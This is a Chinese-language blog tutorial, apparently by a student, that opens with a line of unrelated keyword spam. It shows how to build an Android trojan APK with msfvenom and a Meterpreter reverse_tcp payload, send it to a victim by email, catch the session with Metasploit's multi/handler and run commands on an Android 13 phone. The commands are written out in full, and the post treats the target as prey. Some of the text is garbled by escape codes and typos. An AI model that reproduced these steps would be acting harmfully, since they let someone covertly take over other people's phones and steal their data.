婚庆公司网站建设doc,群晖自行安装wordpress,网站引导动画怎么做,丹徒网站建设代理商额#xff0c;这是我最后一篇文章了#xff0c;周一我们开学了 文章目录前言一、Metasploit是什么#xff1f;演示环境二、生成可执行木马文件1.生成2.运行命令并生成木马配置参数入侵安卓手机命令1.查看对方手机系统信息查看对方手机安装哪些app文件总结前言
前言#xf… 额这是我最后一篇文章了周一我们开学了 文章目录前言一、Metasploit是什么演示环境二、生成可执行木马文件1.生成2.运行命令并生成木马配置参数入侵安卓手机命令1.查看对方手机系统信息查看对方手机安装哪些app文件总结前言
前言前言这是我最难想出来的 对这是我最后一篇文章周一我们开学了漏洞实战怕实现不了至少放假可以更文章我们只放一天 提示以下是本篇文章正文内容下面案例可供参考
一、Metasploit是什么
Metasploit是一个免费的、可下载的框架通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时计算机安全状况也被永久性地改变了。仿佛一夜之间任何人都可以成为黑客每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了这是因为Metasploit团队一直都在努力开发各种攻击工具并将它们贡献给所有Metasploit用户。 Metasploit的设计初衷是打造成一个攻击工具开发平台本书稍后将讲解如何开发攻击工具。然而在目前情况下安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。 工作方式编辑
演示环境
攻击方kali Linux 2022.4 被攻击方Android13 oppo color13.0
二、生成可执行木马文件
1.生成
msfvenom -p android/meterpreter/reverse_tcp LHOST本地ip LPORT本地端口号 R 文件名.apk示例
msfvenom -p android/meterpreter/reverse_tcp LHOST192.168.0.127 LPORT5555 R Android.apk本地端口自己随便设置一个没有被占用的端口号如果端口号被占用那么文件会生成失败换一个端口号就性 如何查看IP地址用ifconfig可以看到
2.运行命令并生成木马 look生成成功了一定要用root权限打开 然后发送我喜欢用邮箱发送这比较快 look ther这样比较快 呃…安卓13防御能力不怎样啊 然后打开msfconsole
配置参数
(1)命令 use exploit/multi/handler选择模块 (2)命令 set payload android/meterpreter/reverse_tcp选择攻击模块 (3)命令 set LhOST 192.168.0.127填写自己主机的IP地址 (4)命令 set lport 5555填写刚才生成文件时的端口号 (5)命令 show options查看设置参数 (6)命令 exploit 执行 好了就等小鱼上钩了 安装完成了 成功了
入侵安卓手机命令
1.查看对方手机系统信息
sysnif查看对方手机安装哪些app文件
applist总结
时间不够了所以不做演示了,所以再见
